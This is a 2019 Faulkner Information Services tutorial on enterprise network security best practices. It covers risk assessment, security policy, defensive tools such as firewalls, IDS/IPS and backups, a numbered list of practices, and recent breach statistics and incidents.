PDF version of this report
You must have Adobe Acrobat reader to view, save, or print PDF files. The reader
is available for free
download.

Network
Security Best Practices

by Faulkner Staff

Copyright 2019, Faulkner Information Services. All Rights Reserved.

Docid: 00018860

Publication Date: 1907

Report Type: TUTORIAL

Preview

In our interconnected world, the network is the gateway to
a corporation. It both enables the conduct of business and
provides one of the biggest security risks.
Over the years, experts have created a series of best
practices designed to mitigate such risks. This report examines
the vulnerabilities and the best practices that enable
companies to protect themselves.

Report Contents:

• Executive Summary
• Description
• Current View
• Outlook
• Recommendations
• Web Links

Executive Summary

[return to top of this report]

Data networks are the backbone of today’s
global communications, improving productivity by allowing a large user
population ready access to applications, processing power, and mass storage;
however, access also makes those resources more vulnerable to abuse and misuse.

Networks are vulnerable to myriad attacks from adversaries with
varying motives, including the search for financial gain, corporate
intelligence, publicity, and revenge. Network security
best practices are designed to protect networks against intruders and the
risks of unauthorized access to mission-critical data, information theft, and
malicious file tampering. These breaches could result in immediate financial
loss, litigation, regulatory penalties and, in the long term, loss of confidence in the enterprise and damage to
competitive position. To address vulnerabilities caused by increasing numbers of
employees working from home as well as increasing numbers of users with global
access, organizations are implementing new network security strategies and best
practices.

With properly enforced top-down security
policies and the right tools, effective measures can
be taken to safeguard information during transmission as well as information
stored at various points on the network, including servers and desktop
computers. These tools include firewalls, intrusion detection/prevention systems, remote
authentication systems, and anti-virus software (which today also
guards against various forms of spyware). A framework to build best
practices includes:

• Performing a risk assessment
• Establishing security policies
• Evaluating/implementing security tools
• Responding to violations

Without question, technology trends will come and go, new products will
displace legacy models and intruders will do their best to circumvent most
measures they come up against. Although developing appropriate best
practices and applying technological tools to meet today’s threats should
provide organizations with more secure networks, these actions solve only part
of the problem. The best outlook for network security and best practices has
little to do with state-of-the-art developments and much to do with awareness
and enterprise-wide leadership that buys into the concept that security starts
with policy enforcement. This includes both the policies that are set
for employees and those that are set within software and hardware – as well as
testing of both and solid plans for mitigation.

Description

[return to top of this
report]

Network security best practices are necessary to protect today’s complex and
diverse organizations. Building a network security program begins with
taking an asset inventory and performing a risk assessment of the networks. This
is followed by developing and implementing security policies that address the
networks’ risks and vulnerabilities, then deploying the
appropriate tools and personnel to mitigate the risks. Finally, networks should
be audited for their compliance with security policy and variances should be
fixed. Even the most robust best practices, however, cannot be effective unless
they are enforced and employees are trained to understand and support them.

Risk Assessments

To determine the threat level faced by an
enterprise, a comprehensive asset inventory and threat assessment must be
undertaken. The threat assessment could include a port scan of all network
resources. A port is simply a place where information goes into and out of a
device on the network, like a router or computer. Left unguarded, a port is a
door through which a hacker can enter and gain access to other
resources on the corporate network. After submitting the network to a battery of
tests, sometimes using hacker tools, the findings are displayed in summary and
detail form. Depending on the tool used, each discovered vulnerability can be
assigned a score indicating the level of risk. The reports can be prioritized
so that the highest level risks appear at the top of the report. This
prioritization allows IT staff to start implementing security measures so that
the most serious and glaring holes are closed first, denying hackers easy access
to the corporate network. 

In addition, a security audit should be conducted
to create a baseline of the organization’s security position. Findings serve to
identify points of entry to the network and possible means of attack from both
an internal and external perspective. It is entirely possible
that compromised endpoints will be discovered during the inventory and audit;
these should be immediately addressed and their impact investigated.
It’s a painful truth that, thanks to mobile devices, the network’s perimeter no
longer stops at the firewall; security personnel have to examine all forms of
access and determine their risk.

Besides assessing hardware and software, risk
levels must also be determined for data that is accessible from the network.
High, medium, or low risk levels should be assigned to the data based on the
effect that lost/leaked data would have on the organization. Data
that, if compromised, could cause legal or financial problems – or even disrupt the
business – should be assessed as high risk and receive
special attention.

After risk levels for network resources are
determined, users should be evaluated for their access requirements.
"Users," for the purpose of the analysis, should
include internal users, both on and offsite, as well as external users such as
customers and business partners. Determining risk levels and types of access
provide the foundation for securing access control to the network. 

Security Policies

Network security best practices begin with
top-down policies that are embraced – and enforced – throughout the organization.
Policy begins with a prioritized, clear understanding of what needs to be
protected and what threats and vulnerabilities need to be protected against.
Network security policies become reality only when individual responsibilities
are understood and deviations from those responsibilities are discovered,
analyzed, and properly managed to prevent or stave off future occurrences.

Organizations should create policy statements,
taking into consideration the organizational structure, individual roles and
responsibilities, existing policies, and service level agreements. Policy
statements should include procedures for immediately responding to security breaches that
could occur. In the event of a violation, response policies should also
state which changes can be made without management approval. 

Security Teams. As part of the policies,
organizations should establish cross-functional security teams that know
security policy and how it translates into security technology. Members would be
responsible for responding to security breaches and reporting to senior
management. Additionally, the team should be responsible for approving security
changes and a member should sit on the organization’s change management team. In
the past, security was simply one small part of the IT department. Today, that
has evolved so that all areas of IT – from servers to cloud computing to
applications – must encompass security so as to have the entire network
protected. 

Network Security Tools

Once policies and assessment vehicles are in
place, the most effective technology-based security measures an enterprise can implement are
firewalls, intrusion detection/prevention systems, remote authentication
systems, anti-virus software, and forensic analysis tools. Additionally, many
organizations implement physical security measures, employ manual or automated
patch management systems, and utilize encryption for critical data in transit.
These solutions are available in the form of dedicated hardware, software, and
managed services.

Firewalls. Firewalls provide a checkpoint
between a "trusted" internal network and an "untrusted" network, such as the
Internet. They implement perimeter security by monitoring all traffic to and
from the enterprise network to determine which packets can pass and which cannot
pass. After examining the packets, they are either forwarded or dropped based on
predefined rules. The network security administrator can control how packet
filtering is performed, permitting or denying connections using criteria based
on the source and destination host or network and the type of network service.

Encryption. By encrypting data, both in
transit and at rest, organizations can further protect critical information.
Encryption strength should be appropriate to the sensitivity of the
data protected.

Intrusion Detection/Prevention Systems. Intrusion detection/prevention systems are real-time tools that monitor for suspicious or
unauthorized activity on all major operating systems, Web servers, firewalls,
routers, applications, and databases. This tool can instantly alert
the security administrator, shuts down systems, terminates offending sessions,
executes commands, and takes other actions to stop attacks in progress before
critical systems can be damaged or sensitive information can be compromised.

Antivirus Software. Antivirus software stops attacks that
corrupt data and harm applications. Most antivirus products can be
configured to either identify changes being made to files and flag them
for attention or to identify and remove viruses and repair the damage
the viruses inflict, as required by the administrator. Questionable
files can be quarantined for further analysis. Antivirus software can
be installed on every endpoint (including mobile devices) to prevent the spread of viruses due to file swapping,
but large organizations also install it on their servers to prevent
infections from the Internet. Much of today’s antivirus software
also look for spyware and malware such as keyloggers or back doors
that might allow a criminal to take control of the machine and use it
in a botnet, as well as looking for suspicious activity that could indicate
exploitation of vulnerabilities. It also employs cloud-based
services that can safely evaluate suspicious content, and quickly
provide mitigation for threats.

Data Loss Prevention. Data loss prevention (DLP) tools are
software programs that monitor access to – and help prevent the
unauthorized distribution of – sensitive data. A relatively new
form of security service, data loss prevention, also known as "data
leak prevention" or "outbound content management," is
intended to protect an organization against the financial loss, operational impact, and brand damage
associated with data breaches, especially high-profile exposures
involving employee or customer personally identifiable information (PII). Also, by helping safeguard confidential or proprietary information, data
loss prevention tools help organizations comply with data secrecy
standards, like those imposed by the Health Insurance Portability and
Accountability Act (HIPAA).

Forensics. Forensics within the context of
networks entails the capture, recording, and analysis of network events to
discover the source of security attacks or other problem incidents. Complex
forensics solutions examine network relationships regardless of physical
topologies and allow the user to visualize network traffic patterns as
behavioral clusters. They frequently employ big data
analytics. Less complicated offerings consist of essentially two kinds
of network forensics systems. Catch-it-as-you-can systems capture all
packets passing through a certain traffic point and are written to storage for
off-line analysis in batch mode. This type of system requires huge amounts of
storage. Stop, look, and listen systems analyze each packet in a
rudimentary way in memory and only save certain information for future analysis.
This approach requires less storage but may require a faster processor and a lot
of memory to keep up with incoming traffic.

Data Backups. Often, companies don’t realize the criticality of
backing up their network data – documents, files, contacts, etc. – until it’s
too late. Whether it’s a natural disaster like a hurricane destroying a
company’s headquarters or a ransomware attack wiping out an organization’s data,
backups are a must. Several Florida cities were hit by ransomware attacks in
June 2019 and a few decided to pay the ransom to try and get their critical
files back. This is a tactic that the FBI and the Department of Justice advise
against since it encourages cybercriminals and, despite paying the fee, there’s
no guarantee that an organization will be able to retrieve its files. Instead,
it helps to be prepared ahead of an incident by regularly having data backed up
so that if a virus or another incident negatively impacts the network,
information can be reinstated. It is recommended that data should be backed up
locally and offsite. Cloud backup solutions are highly recommended by
experts. 

Security Certifications. Getting the most
out of network security tools requires trained personnel; certifying
organizations offer a number of certificates based on levels and types of
network security expertise.

Global Information Assurance Certification (GIAC),
an organization founded by the SANS Institute in 1999, offers a variety of
standalone security certifications in specific areas of expertise such as
network protection strategies, malware and data loss prevention, and incident
response.

The nonprofit International Information Systems
Security Certification Consortium (ISC)² offers one of the leading
security certifications – the Certified Information Systems Security
Professional (CISSP). The CISSP program offers credentials for those responsible
for developing and managing the implementation of security policies, standards
and procedures. Another (ISC)² certification, the Systems Security
Certified Practitioner (SSCP), is designed for network and systems
administrators involved in security implementations.

The value of these security certification
programs is universally recognized. Certifications should be stipulated in job
descriptions and used as a means of screening qualified candidates during the
hiring process.

Tools Are Not Enough. The best technologies are useless if the
policies an organization has in place are not enforced. Network security best
practices – organizational security practices in fact – start with appropriate
policy definition, enforcement, continued awareness, and testing. Failure to do
so leaves the entire organization at risk.

Responding to Violations. Averting attacks on an enterprise network is
important, but if an attack succeeds, finding the cause is essential to stopping
further exploitation of the vulnerability. New rules may have to be loaded to
the firewall, for example. In addition, the scope of the damage to the
organization’s network and data must be assessed and remediated and policies re-visited and
revised.

Current View

[return to top of this
report]

Today’s best practices are designed to protect networks from intruders, but
who are the most prevalent offenders? And what are their most frequent offenses?
Findings from recent computer crime surveys answer those questions as well as
detail some of the most widely-installed tools to support network security best
practices. Even with best practices to deter these offenses, a lax security
culture can present problems. Some current and general network security best
practices, covering both tools and culture, can be considered.

Intruders. IBM and Ponemon published their joint
report, 2018 Cost of Data Breach Study: Global Overview, which found that
the average cost of each stolen or lost record in a data breach increased slightly from
$141 in 2017 to $148 in 2018. The average cost for a data breach,
as determined by the nearly 500 companies surveyed, increased from $3.62 million to
$3.86
million. The 2018 study calculated the costs of "mega breaches," which
encompasses the loss of one million to 50 million records and found that mega
breaches had increased from nine in 2013 to 16 in 2017. The average cost of a
data breach in which one million records were lost is $40 million. At a loss of
50 million records, breach costs can soar to upwards of $350 million.¹ 

Verizon’s Data Breach
Investigations Report for 2019 found that 69 percent of breaches manifested from
outsiders, 34 percent came from people on the inside, two percent involved
partners, and five percent featured multiple parties. Sixteen percent of
breaches affected public sector organizations while 15 percent of data incidents
impacted healthcare entities.²

Network Offenses. Various tactics are used
to infiltrate data and compromise networks. Breaches can occur as a
result of ransomware attacks, social engineering, stolen or easy to guess
passwords, and more. The FBI’s Internet Crime Complaint Center (IC3) has
repeatedly warned that business email compromise (BEC) and email account
compromise (EAC) scams are rampant as criminals take advantage of unsuspecting
victims. This type of scam works often because the cyber thieves compromise
legitimate email accounts through sophisticated social engineering techniques to
conduct unauthorized wire transfer payments. BEC/EAC schemes are flourishing and
in 2018 alone, the IC3 investigated 20,373 complaints regarding this type of
scam. The end result was over $1.2 billion in losses, a major increase from
2017’s $675 million in losses thanks to BEC scams.³

Security Tools. To
prevent security breaches, organizations use a variety of network security
technology tools to support best practices. Firewalls,
heuristics-based spam filtering, electronic access control systems, complex passwords, network-based
policy enforcement, antivirus software, and encryption are among those
used often for protecting information. In addition, other widely-installed security
technologies included Internet connection monitoring, anti-spyware and intrusion
detection/prevention. With the increasing insecurity of Internet of
Things (IoT) devices making the news, it’s important to consider what’s
available for protecting these offerings. At the very least, experts recommend
that default passwords immediately be changed prior to enabling IoT devices to
access the Web. 

Security Culture. Even
with robust policies, network security best practices are challenging to
implement across global organizations. Problems develop when companies have
locations in regions or countries that have no background in security awareness.
Other security loopholes can exist within acquired companies, business
partnerships, or outsourcing companies. The people factor cannot
be underestimated – the number one technique used in breaches
continues to be social engineering.

Network Security Best Practices

Network security best practices are many and
diverse, often specific to the needs of particular organizations. Some current
and general best practices follow. 

1. Develop and Enforce Universal Security Policy. Establishing security policies is critical, enforcing them
stringently across the enterprise in all cases for all employees is imperative.
Far too many organizations spend large portions of security budgets on
technologies and solutions that hinge on a single factor – security policy
enforcement and review. Without policy enforcement they may as well just be
giving those funds away.

2. Establish and Conduct Ongoing Security
Awareness Training. In order to support best practices, employees
need to understand evolving security policy – and the need for procedures and
technical controls. Training sessions should be attended by all personnel levels
to develop a culture of security awareness, and regular refresher sessions
should be conducted to ensure security remains top-of-mind. 

3. Perform Background Checks When Hiring. Recognize
that many security breaches originate from within the organization. Steps
can be taken to minimize this risk when filling sensitive positions. During the
hiring process, for example, ensure that references from past employers are
thoroughly checked, that the applicant’s resume accounts for all time from high
school to the present, and that the applicant’s work experience and education
are not exaggerated. Determining the level of personal responsibility and
reliability of a candidate for employment is crucial, even to the point of
checking a credit report for indebtedness or bankruptcy, or police records for
arrests and convictions.

4. Separate Duties and Limit Access to
Critical Functions. In areas of critical
functions, divide duties among several employees and authorize individuals’
access to only the resources needed to do their separate jobs. This step could
eliminate fraud or sabotage. 

5. Administer Security at the Appropriate Level. Administer security policy on the
level that impacts the fewest users and still satisfies the need for
administration. For example, if a policy is being administered that affects
every workstation and user in the enterprise, the policy additions should be
made on the highest level – the enterprise level. This means never making an
addition to the enterprise level of any policy that is not meant to affect
every computer in the enterprise. If a policy is being administered that
only affects
all users on a particular computer, the policy additions should be made
at the
machine level. If a policy is being administered for a particular user or
group of users, however, the policy additions should be made on the user level.

6. Establish a Secure Exit Process for
Employees Who Leave. Upon resignation or dismissal, any computers or devices
issued to the employee should be immediately retrieved and all network privileges
revoked (especially remote access). Employee-owned devices should be
wiped of all corporate data. All encryption keys and administrative passwords that the
employee was privy to throughout the organization should be changed
without delay. Furthermore, that person’s ID badge should be collected
before he or she is escorted from the building. The departing employee’s
email account must be canceled immediately, as well, or set to forward mail to
a supervisor’s email account. The harsh reality of network intrusions from
within the organization justifies such measures.

7. Backup Configuration Information. Regardless
of the firewall and intrusion detection/prevention locations and the scale of specific
solutions, keep backup copies of the rule sets, along with any passwords that
protect access to such systems. A copy of the most recent router
configurations should be kept as well, since this information is usually needed
to reconstrong> the firewall or router in case of a major system failure. Keeping
backup copies of such information will also reduce the downtime of these
systems, since configurations can be loaded immediately, instead of manually
re-entered. If a managed firewall service is used, ensure that the provider
maintains backup copies of the rule sets for all locations, along with all the
firewall passwords, and that you have a copy of that information.

8. Harden Configurations. If security
is to be effective, the access controls of firewalls, intrusion
detection/prevention
systems, remote authentication systems, and servers and software must be reset from their
factory-installed default settings before installation on the network. Default passwords should be changed, and default SSIDs on
wireless devices should be altered. Failure
to do so can result in hackers exploiting this vulnerability to grant themselves
access to the network at will. It is even possible for hackers to hijack control
of these systems from the security administrator. Failure to take this
elementary precaution can result in a network that is easy prey for hackers. In
addition, vendor-released patches should be used to plug security holes; however
it’s best to test patches in a lab before installing on the live network. 

9. Backup All Data. When all else
fails, data may have to be reloaded to servers and other devices on the network.
But this requires that all data be backed up in the first place. Without this
important step, a small breach could become a major incident.
Regular backups of enterprise information should be performed and off-line
backup tapes or a remote storage site should be maintained, and
transported media should be encrypted to ensure the security of data
in transit. Periodic test
restores should be performed to ensure that all data can be retrieved promptly
in case of an emergency. It is also useful to retain original copies of
software; if a system is hacked, backup copies may be infected, making it
necessary to re-install the originals.

10. Enable Logging and Log Archiving. Logging
can help identify suspicious activity on the network. Because the number of
items to be monitored is virtually limitless, it is best to focus on a two key
areas: failed login attempts and permission changes. Newer monitoring tools can
automate this process and send alerts to administrators if suspicious activity
is detected; they also permit monitoring of more parameters. Logging also helps
security administrators understand how an attack was launched and if it was
successful. Logs are not always reliable, however, because hackers can
(and do) change
log entries to cover their tracks. There are even tools available that
change the date and time that files were last accessed.

11. Document and Maintain a Network Map. Document
and maintain a map of your network. This will help IT staff to respond more
quickly to a security incident. This document will help reinforce everyone’s
understanding of the network. The documentation should include hardware and
software configurations, IP addressing, and router/firewall configurations. It
should include warranty and purchase information for all equipment. Included in this document
should be phone numbers for vendors and consultants as well. With this
list in hand, even a backup system administrator will be able to respond to
security incidents in a timely manner. The information can be stored
in a corporate configuration management database (CMDB), many of which
include visualization tools that present a network map automatically.

12. Implement a Firewall. A firewall is
one of the most effective security administration tools. Based on rule sets that
are loaded into the firewall, the passage of traffic into and out of the
organization can be restricted according to its source and destination, specific
applications and types of files, users or groups of users, and even limit access
to specific resources by time of day. Firewall capabilities can be added to
existing routers via software. When ordered with new Internet connections, the
service provider can deliver the firewall-equipped router pre-constrong>d and
pre-programmed for installation. The firewall can reside at the hub location on
the network to provide protection for the branch offices connected to it,
further reducing the cost of deployment.

13. Encrypt Sensitive Data. Encryption
helps to protect both the privacy of sensitive data and user authentication
information sent over the internet. In addition, encryption may be required by
the Healthcare Insurance Portability Act (HIPAA), Sarbanes-Oxley Act, or other
mandates, depending on the industry and location. Data should be encrypted both
at rest and in transit.

14. Implement Intrusion Detection/Prevention. Hackers
use port scanning tools such as Network Mapper that probe for a target
network’s vulnerabilities. The hacker checks for every possible piece of
network software on a server, for example. If the hacker detects the presence of
active software, he or she tries to find out more information about the
computer. The hacker then tries to exploit that port further until he or she can
enter the network at will. An intrusion detection/prevention system monitors all ports for
this kind for scanning activity and raises alarms if suspicious activity is
found. Some intrusion detection/prevention systems automatically shut down the
vulnerable port when a scan is detected.

15. Keep Hardware and Software Updated. Hackers are well
aware of security vulnerabilities in computers, network equipment, and the
software that runs them, and will exploit them. Security-related patches and
firmware updates should be evaluated as soon as they are released, and applied if
appropriate. A perfect example of why companies must always be on top of
patching software and hardware manifested in the WannaCry ransomware attacks. Although Microsoft had already issued an update two months prior for
the vulnerable software that was the target of WannaCry, the Server Message
Block protocol, many organizations had either not bothered to push out the
update or else were using unsupported Windows versions like Windows XP.
Microsoft did step up and release emergency security patches to deflect WannaCry
but for those networks which had already been damaged by the ransomware, the
patches came way too late. In 2019, Shodan, a search engine for exposed
databases and devices, showed that over one million computers are still
vulnerable to the exploits that resulted in the WannaCry attacks. Some vendors –
including Microsoft, SAP, Oracle, Google, and Adobe – release security bulletins
comprised of patches and vulnerability updates on a monthly or quarterly basis
to help companies keep their systems and networks protected.  

16. Respond to Violations Immediately. The
security team must be alerted when an intrusion is detected; tools are available
to automate this process. Response
procedures should be defined that detail levels of authority within the team to
make changes. Some possible actions include: isolating or shutting down breached
systems, making changes to stop access to the intrusion, and alerting internal
management and legal staff. Information about an attack should be collected to
determine the extent of a violation and the systems affected; this information
could be used if violations are prosecuted. Staff should be
trained in proper forensic procedures to ensure evidence is preserved
and admissible in court. 

17. Subscribe to an Anti-Malware Update Service. Whether
the software is loaded on individual clients or servers, it is
imperative to subscribe to an update service to ensure that the enterprise
network stays protected against new and emerging malware. This is more important
than ever before. Not only are the numbers of viruses, worms, trojans
and other malware increasing, but the type
of threat and method of delivery are constantly evolving as well. Newer viruses
can alter their behavior to avoid detection by traditional scanning methods that
merely look for the signatures of known viruses. New detection methods are
available that look not only for the signatures of known viruses but monitor for
any suspicious behavior exhibited by files and then isolate them before they
have a chance to execute and propagate on the network. Newer still is
reputation-based detection, which relies on crowdsourcing of data in close to
real time.

18. Secure the Premises. Physical access
to the network must be "locked down" by taking such often ignored
precautions as locking doors to sensitive areas, including those to the wiring
closets on each floor, equipment rooms, and the basement area containing
incoming carrier lines and associated interfaces. Access to the data center and
network operations center must be tightly controlled as well. And there must be
frequent monitoring for the presence of unauthorized wireless access points in
the building, the signals of which can be picked up outside the building by a
breed of hackers known as “war drivers” who are often equipped with
high-gain antennas that can pull in even the weakest of signals. All of these
should be treated as potential breach points, especially since they are behind
the firewall and, consequently, unprotected.

19. Develop and Test a Business
Continuity (Disaster Recovery) Plan. Recent
disasters have shown that developing an effective business continuity plan is
critical to optimum recovery. Organizations that have successfully
survived not
only identified functions that were business critical and planned for their
recovery, they also periodically tested plans before the actual disaster. Some
network security best practices should be part of an organization’s business
continuity plan. The hope is always to have a successful business continuity
plan in place… and never have to use it. 

20. Pay Attention to Web Site Security. Web
servers can provide very easy access to the corporate network by even relatively
unskilled hackers. Make sure the material on the Web site contains no
links back to the main servers or to corporate databases and that the
sites are regularly checked for vulnerabilities. Administrative access to the site should be
password protected.

21. Engage Ethical Hackers to Conduct Network Penetration Exercises.
Many organizations are not willing to address software security
until there is unmistakable evidence that the organization is vulnerable. If security has not been a priority, external penetration testers
can demonstrate that the organization’s network is security-deficient. In
particular, penetration testers, often known as "ethical hackers," can be brought in to break a high-profile
network application in order to make the point. This type of
exercise has gained traction in recent years as the Department of Defense has
employed "Hack the Pentagon" and other similar events for white hat
hackers to attempt to penetrate the private defense agency’s infrastructure,
find vulnerabilities, and get paid to do so. 

23. Secure Sensitive Information. It seems logical that sensitive data would
be kept under lock and key but that’s not always the case as auditors at KPMG
discovered when checking on the offices and cubicles for none other than the
staff for the Department of Homeland Security’s CIO and chief financial officer.
The auditors uncovered instances of unsecured documents which stated "for
official use only" as well as passwords written down on scraps of paper
left out in the open. Also spotted were unsecured laptops and mobile devices.
Passwords should never be written down unless they are secured in a locked
cabinet. Smartphones and computers must be kept secured at all times.

Outlook

[return to top of this
report]

As organizations’ networks become more global, the
focus of best practices must expand beyond protecting the bricks and mortar of
local offices to securing virtual and real offices located around the
world – along with partners, customers, and remote and mobile users. To effectively face all
of these changes, the list of best practices must become a "living
document" that adds a protective layer to the growing network. 

Home Workers. Security
best practices also apply to employees who work remotely. Some organizations
consider that working from home is a privilege, not a right. These organizations
require teleworkers to sign a contract allowing for periodic inspections of home
offices. If employees do not sign, they are not allowed to work from home.
Although this is an unusual policy, some say that companies do have the
authority to enforce security policies in home offices. As the number of
teleworkers increases, organizations will have to deal with new
sets of policies for remote and wireless access. Some
companies even require remote or mobile employees to only access their
networks over a secured virtual private network (VPN) using company-owned equipment running a company-standard
software image, to eliminate the chance of infection from malware on
personally-owned machines.

Mobile Devices. Smart phones and
tablets have become the devices of choice, and their security profiles are less
mature than those of traditional computers. This raises a whole new set
of concerns and introduces risks that hadn’t been previously considered,
like the bring-your-own-device (BYOD) movement in which enterprise
users, who are also consumers, pressure enterprise IT departments to
allow the connection of consumer-grade devices, like smartphones and
tablets, to enterprise networks. Security personnel must also monitor
the increasing functionality of wearable devices such as fitness bands
to ensure they don’t put the enterprise at risk.

Updates. Policies
drive network security best practices; to keep pace in this rapidly changing
world, updating security policies is necessary. Some reasons for updating
policies are:

• New Technology – New
  technologies are often introduced before organizations realize their
  vulnerabilities. The BYOD
  trend opens endless possibilities, as unknown and likely unsupported devices
  are introduced.

• Retired Technology –
  Security issues may arise when a product is retired by its vendor, thus
  eliminating security updates and support. Windows XP presents a
  significant risk, given the termination of patch generation, as do Windows Server 2003
  and SQL Server 2005; many companies have still not yet migrated to a
  supported operating system, so are vulnerable to attacks targeting the OS.

• Regulatory Compliance – Compliance with the Privacy Act,
  Sarbanes-Oxley, and HIPAA Privacy Rule, and other local regulations, are
  issues that have caught the attention of upper management – resulting in
  organizations updating their security policies. Compliance with customer
  privacy regulations will continue to be especially critical in financial,
  healthcare, and pharmaceutical companies. Organizations that demonstrate
  compliance will not only be viewed as good "corporate" citizens, they will
  also have a competitive edge in a growing regulatory-conscious environment.

• Changing Business Models – Organizations
  will increasingly change the way they do business – using the Internet to
  interact with staff, customers, partners, and suppliers. This
  network-centric business model continues to blend network
  structures – that were previously isolated – and in the process expand the
  landscape of security vulnerabilities. Cloud computing, for
  example, has introduced a whole new series of challenges, as has the trend
  towards mobile first.

Recommendations

[return to top of this report]

Training for Security Awareness. The
need for employees to support network security best practices is critical.
Support begins and continues with periodic security awareness training for the entire
organization; training everyone prevents inconsistencies in security
awareness within different employee levels. Security awareness is so important
to some companies that they link employee bonuses to attendance at awareness
training sessions. Other companies give employees rewards for following best
practices – and publicize successes; however, lax employees face consequences. To
improve training, some organizations are piggy-backing training with
company-wide events and meetings. Others include security articles in existing
newsletters or on their company Intranets. Security training must be
continually reinforced. 

For training and best practices to be effective they must be
supported by top management. Since executives lead by example, they should not
have "inconvenient" security features shut down on their personal
systems or it will negatively affect the security morale for others in the
organization as well as introducing unnecessary risk. 

Updating Policies/Practices. Network
security policies and best practices are living documents that need to be
periodically reviewed and updated. Reviews should include an annual risk
analysis to provide detailed security requirements. These detailed security
requirements become the basis for an optimal security position. An evaluation of
current security measures versus desired protection could also be considered. If
a major change in the organization occurs, being it technological or
organizational, this should also be the cue to revisit policies.

Securing Globally. Many
organizations are now expanding security focus to include global suppliers,
partners, customers, acquisitions, and outsourcers. For global organizations,
regulations and security technologies that are supported in the US may not be
allowed abroad, and some US regulations such as the Patriot Act are
considered unacceptable to other countries; to be compliant, security practices should be deployed based on
the requirements and cultures of specific countries or regions. Outsourcing
offshore introduces other security risks. Before offshore shipment to
outsourcers, some companies constrong> all servers, laptops, and PCs to
corporate standards at head office.
Require security audits of suppliers who connect to corporate assets;
the infamous Target breach was expedited by a compromised supplier who
had access to Target’s network. To further protect the infrastructure, home office employees travel to the global
location for the installation of a dedicated network connection with firewalls.
Prior to signing a global outsourcing contract, security audits are
advised – including an audit of the physical site – and SLAs should
specify security requirements. Political risks should also be
considered.

Keeping Up With Security Threats and Tools. The
continued effectiveness of security depends on the network security
administrator staying alert to new and emerging threats. This entails
establishing and maintaining contact with various network security watch groups,
such as CERT, US-CERT, SANS, and others. It also entails installing security
patches and antivirus updates in a timely manner when they are issued by
vendors to plug newly discovered security holes in their products. Any lapse in
staying abreast of these developments can compromise network security. It
is also important to keep up with new and emerging network security solutions.
Because of tremendously increased security threats in the past few years,
vendors have responded with new tools and techniques, including network sign-on
tools that immediately identify systems that do not have the most recent
antivirus files or system security patches installed. Analytics, in
conjunction with logs, alerts, threat data, and other security-related
information, are increasingly being employed to predict and prevent security
issues.

Have a Plan. In November 2018, Marriott International went
public with information regarding a breach of its Starwood guest reservation
database. Up to 500 million people had their personal data exposed. Various
hotel chains, including St. Regis, Sheraton Hotels & Resorts, and Westin
Hotels & Resorts were affected. However, the breach had been ongoing
since 2014 and had remained undetected until September 2018.
Unfortunately, this is not a rarity anymore as it’s often months – sometimes
years – before a company is aware that it has fallen to a data compromise. Assume that if
the organization hasn’t yet been breached, it likely will be at some point, and
plan for mitigation and remediation.

Considering Multiple Security Solutions.
It is imperative to recognize that no single security solution fits all
contingencies, and layered security is often required. Firewalls, for example, may not include virus protection,
particularly if the firewall is part of a managed security service offered by a
third party. Many firewalls do not include intrusion detection/prevention capabilities.
Multiple systems require personnel with
appropriate expertise, which also drives up the cost of doing business. However,
considering the cost of a breach caused by neglecting these precautions,
including the effect on company reputation and future business, the price of
good security is a bargain.

References

¹ IBM and Ponemon Institute. "The 2018
Cost of a Data Breach." July 11, 2018. 
²
Verizon Enterprise. "2019 Data Breach Investigations Report." May
8, 2019.
³ Internet Crime Complaint Center. "2018 Internet Crime Report."
April 23, 2019. 

Web Links

[return to top of this report]

Adobe: https://www.adobe.com/ 
Department of Homeland Security: https://www.dhs.gov/ 
Department of Defense: https://www.defense.gov/ 
FBI: https://www.fbi.gov/ 
Global Information Assurance Certification: https://www.giac.org/ 
Google: https://www.google.com/ 
IBM: https://www.ibm.com/ 
International Information Systems Security Certification Consortium:
https://www.isc2.org/
Internet Crime Complaint Center: https://www.ic3.gov/ 
Microsoft: https://www.microsoft.com/ 
Oracle: https://www.oracle.com/ 
Ponemon Institute: https://www.ponemon.com/ 
SANS Institute: https://www.sans.org/ 
SAP: https://www.sap.com/ 
US-CERT: https://www.us-cert.gov/ 
Verizon Enterprise: https://enterprise.verizon.com/ 

[return to top of this report]